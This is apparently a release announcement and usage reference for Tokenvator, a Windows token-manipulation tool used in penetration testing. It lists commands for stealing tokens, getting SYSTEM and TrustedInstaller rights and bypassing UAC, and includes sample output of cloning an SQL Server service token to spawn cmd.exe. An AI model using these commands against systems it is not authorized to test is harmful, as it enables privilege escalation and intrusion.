Tokenvator v3.0.1 releases: A tool to elevate privilege with Windows Tokens

by do son · Published · Updated

Tokenvator

Tokenvator

A tool to elevate privilege with Windows Tokens

This tool has two methods of operation – interactive and argument modes

Interactive Mode:
C:> tokenvator.exe
(Tokens) > steal_token 908 cmd.exe
(Tokens) >

Arguments Mode:
C:> tokenvator.exe steal_token 908 cmd.exe
C:>

Methods

  • GetSystem

    • Optional Parameters: Process ID, Command
    • Examples:
      (Tokens) > GetSystem
      or
      (Tokens) > GetSystem 504
      or
      (Tokens) > GetSystem 504 regedit.exe

  • GetTrustedInstaller

    • Optional Parameters: Command
    • Examples:
      (Tokens) > GetTrustedInstaller
      or
      (Tokens) > GetTrustedInstaller regedit.exe

  • Steal_Token

    • Parameters: Process ID
    • Optional Parameters: Command
    • Examples:
      (Tokens) > StealToken 1008
      or
      (Tokens) > StealToken calc regedit.exe
      or
      (Tokens) > StealToken 1008 regedit.exe

  • BypassUAC

    • Parameters: Process ID
    • Optional Parameters: Command
    • Examples:
      (Tokens) > BypassUAC 1008
      or
      (Tokens) > BypassUAC regedit.exe
      or
      (Tokens) > BypassUAC 1008 regedit.exe

  • List_Privileges

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > List_Privileges

  • Set_Privileges

    • Parameters: Privilege
    • Optional Parameters: –
    • Examples:
      (Tokens) > Set_Privileges SeSecurityPrivilege

  • List_Processes

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > List_Processes

  • List_Processes_WMI

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > List_Processes_WMI

  • Find_User_Processes

    • Parameters: Username
    • Optional Parameters: –
    • Examples:
      (Tokens) > Find_User_Processes domain\user

  • Find_User_Processes_WMI

    • Parameters: Username
    • Optional Parameters: –
    • Examples:
      (Tokens) > Find_User_Processes_WMI domain\user

  • List_User_Sessions

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > List_User_Sessions

  • WhoAmI

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > WhoAmI

  • RevertToSelf

    • Parameters: –
    • Optional Parameters: –
    • Examples:
      (Tokens) > RevertToSelf

  • Run

    • Parameters: Command
    • Optional Parameters: –
    • Examples:
      (Tokens) > Run cmd.exe

Changelog v3.0.1

  • Added Clone_Token
C:\>Tokenvator.exe Clone_Token /Process:3824 /Command:cmd.exe

(Tokens) >

Option               Value

------               -----

process              3824

command              cmd.exe



[+] 3824 sqlservr

[*] Command: cmd.exe

[*] Arguments:

[*] If the above doesn't look correct you may need quotes



[+] SeCreateTokenPrivilege is present and enabled on the token



[-] SeSecurityPrivilege is not enabled on the token

[*] Enabling SeSecurityPrivilege on the token

[*] Adjusting Token Privilege SeSecurityPrivilege => SE_PRIVILEGE_ENABLED

 [+] Recieved luid

 [*] AdjustTokenPrivilege

 [+] Adjusted Privilege: SeSecurityPrivilege

 [+] Privilege State: SE_PRIVILEGE_ENABLED



_SECURITY_QUALITY_OF_SERVICE

_OBJECT_ATTRIBUTES

[*] Recieved Process Handle 0x02E4

[*] Recieved Token Handle 0x02E8

[+] Source: Advapi

[+] User:

S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER

[+] Enumerated 12 Groups:

S-1-16-12288                                       Some or all identity references could not be translated.

S-1-1-0                                            Everyone

S-1-5-21-258464558-1780981397-2849438727-1005      DESKTOP-J5KC1AR\PdwComputeNodeAccess

S-1-5-32-558                                       BUILTIN\Performance Monitor Users

S-1-5-32-545                                       BUILTIN\Users

S-1-5-6                                            NT AUTHORITY\SERVICE

S-1-2-1                                            CONSOLE LOGON

S-1-5-11                                           NT AUTHORITY\Authenticated Users

S-1-5-15                                           NT AUTHORITY\This Organization

S-1-5-5-0-217494                                   Some or all identity references could not be translated.

S-1-2-0                                            LOCAL

S-1-5-80-0                                         NT SERVICE\ALL SERVICES

[*] Enumerating Token Privileges

[*] GetTokenInformation (TokenPrivileges) - Pass 1

[*] GetTokenInformation - Pass 2

[+] Enumerated 9 Privileges



Privilege Name                               Enabled

--------------                               -------

SeAssignPrimaryTokenPrivilege                False

SeIncreaseQuotaPrivilege                     False

SeShutdownPrivilege                          False

SeChangeNotifyPrivilege                      True

SeUndockPrivilege                            False

SeImpersonatePrivilege                       True

SeCreateGlobalPrivilege                      True

SeIncreaseWorkingSetPrivilege                False

SeTimeZonePrivilege                          False



[+] Owner:

S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER

[+] Primary Group:

S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 NT SERVICE\MSSQLSERVER

[+] ACL Count: 659

[*] Updating Desktop DACL

[+] hDesktop : 0x02F0

 [+] Recieved DACL : 0x293CC0284C4

 [+] Create Everyone Sid - Pass 1 : 0x000C

 [+] Create Everyone Sid - Pass 2 : 0x293CC03F530

 [+] Added Everyone to DACL : 0x293CC03A0B0

 [+] Applied DACL to Object

[+] hWinSta0 : 0x0318

 [+] Recieved DACL : 0x293CC04B8B4

 [+] Create Everyone Sid - Pass 1 : 0x000C

 [+] Create Everyone Sid - Pass 2 : 0x293CC03F610

 [+] Added Everyone to DACL : 0x293CC053400

 [+] Applied DACL to Object

[*] CreateProcessWithTokenW

 [+] Created process: 7140

 [+] Created thread:  11228

 

Download

Copyright (C) Alexander Leary (@0xbadjuju), NetSPI – 2018

Source: https://github.com/0xbadjuju/

Tags: Tokenvator